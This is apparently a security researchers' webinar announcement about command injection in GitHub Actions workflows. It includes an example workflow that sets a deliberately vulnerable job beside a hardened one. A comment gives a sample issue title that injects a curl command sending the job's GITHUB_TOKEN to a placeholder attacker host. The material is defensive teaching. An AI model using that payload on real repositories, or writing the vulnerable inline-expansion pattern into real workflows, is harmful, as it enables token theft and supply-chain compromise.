GitHub Actions is an increasingly popular DevOps tool, mainly due to its rich marketplace and ease of use.
As part of our research into the GitHub Actions security landscape, we found that writing a truly secure GitHub Actions workflow is harder than it looks: several pitfalls can have severe security consequences. For example, many developers use event input data (such as the title or body of a pull request or issue) to drive their workflow logic. That data can be controlled by an attacker, and a workflow that trusts it can have its build process compromised. Unless developers have a deep understanding of GitHub's best-practices documentation, their workflows are likely to contain such mistakes. These mistakes are costly, and they can create supply-chain risk for the application.
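As an added illustration of the pitfall described above (this is example code written for this page, not a workflow taken from any of the projects discussed in the webinar), the fragment below shows an issue-triggered job that interpolates attacker-controlled event data directly into a shell step, next to a hardened version. The repository name, job names and the `gh` CLI usage are hypothetical; the mechanism itself is documented GitHub behaviour: a `${{ ... }}` expression inside `run:` is expanded into the script text before the shell executes it, so a crafted title can break out of the intended command.

```yaml
# Added example workflow (not from the original page or any project it names).
# Trigger: a new issue is opened. The issue title is fully controlled by
# whoever opens the issue, i.e. by an anonymous attacker on a public repo.
name: triage

on:
  issues:
    types: [opened]

jobs:
  # VULNERABLE: the expression is substituted into the script text itself.
  # A title such as   a"; curl http://evil.example/$GITHUB_TOKEN; echo "
  # becomes part of the shell program and runs with the job's token.
  vulnerable-triage:
    runs-on: ubuntu-latest
    steps:
      - name: Label by title (unsafe)
        run: |
          echo "Triaging issue: ${{ github.event.issue.title }}"

  # HARDENED: the same data is first placed in an environment variable.
  # The runner still expands the expression, but only into the value of
  # TITLE; the script text never changes, and "$TITLE" is a quoted string
  # to the shell, so the title cannot become additional commands.
  hardened-triage:
    runs-on: ubuntu-latest
    # Least privilege: the job only needs to read issues and add a label.
    permissions:
      issues: write
      contents: read
    steps:
      - name: Label by title (safe)
        env:
          TITLE: ${{ github.event.issue.title }}
          ISSUE_NUMBER: ${{ github.event.issue.number }}
          GH_TOKEN: ${{ github.token }}
        run: |
          echo "Triaging issue: $TITLE"
          # Hypothetical triage rule for the example: tag bug reports.
          case "$TITLE" in
            *[Bb]ug*) gh issue edit "$ISSUE_NUMBER" --add-label bug ;;
          esac
```

The same pattern applies to any other user-influenced context value (pull-request titles and bodies, branch names, commit messages, review comments): pass it through `env:` and reference it as a quoted shell variable rather than expanding it inline, and scope the job's `permissions:` so that a compromised step gains as little as possible.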
During the webinar, we discuss how we found and disclosed vulnerable workflows in several popular open-source tools, delve into the GitHub Actions architecture to understand the possible consequences of these vulnerabilities, and present mitigations for such issues.